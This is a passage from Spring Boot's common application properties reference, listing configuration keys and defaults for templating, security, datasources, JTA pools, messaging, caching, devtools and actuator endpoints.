({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=text\/html\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. 
A random secret is generated by default\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n\tsecurity.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if initialization fails\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27017)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.version=2.6.10 # version of Mongo to use\n\tspring.mongodb.embedded.features=SYNC_DELAY # comma-separated list of features to enable\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA 
connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 
0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 
0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 
0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT 
({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.listener.acknowledge-mode= # acknowledge mode of container\n\tspring.rabbitmq.listener.auto-startup=true # start the container automatically on startup\n\tspring.rabbitmq.listener.concurrency= # minimum number of consumers\n\tspring.rabbitmq.listener.max-concurrency= # maximum number of consumers\n\tspring.rabbitmq.listener.prefetch= # number of messages to be handled in a single request\n\tspring.rabbitmq.listener.transaction-size= # number of messages to be processed in a transaction\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # hornetQ host (native mode)\n\tspring.artemis.port=5445 # hornetQ port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, 
embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.listener.acknowledge-mode= # session acknowledgment mode\n\tspring.jms.listener.auto-startup=true # start the container automatically on startup\n\tspring.jms.listener.concurrency= # minimum number of concurrent consumers\n\tspring.jms.listener.max-concurrency= # maximum number of concurrent consumers\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK 
({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, default to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluding for triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER 
({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # defaults to '\/'\n\tmanagement.add-application-context-header= # defaults to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HYPERMEDIA ENDPOINTS\n\tendpoints.docs.enabled=true\n\tendpoints.docs.curies.enabled=false\n\tendpoints.hal.enabled=true\n\tendpoints.links.enabled=true
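\n\n\t# Example (editor's sketch, not part of the reference): a common lock-down\n\t# pattern is to disable all endpoints and then re-enable a chosen few:\n\t#\n\t# endpoints.enabled=false\n\t# endpoints.health.enabled=true\n\t# endpoints.info.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. 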
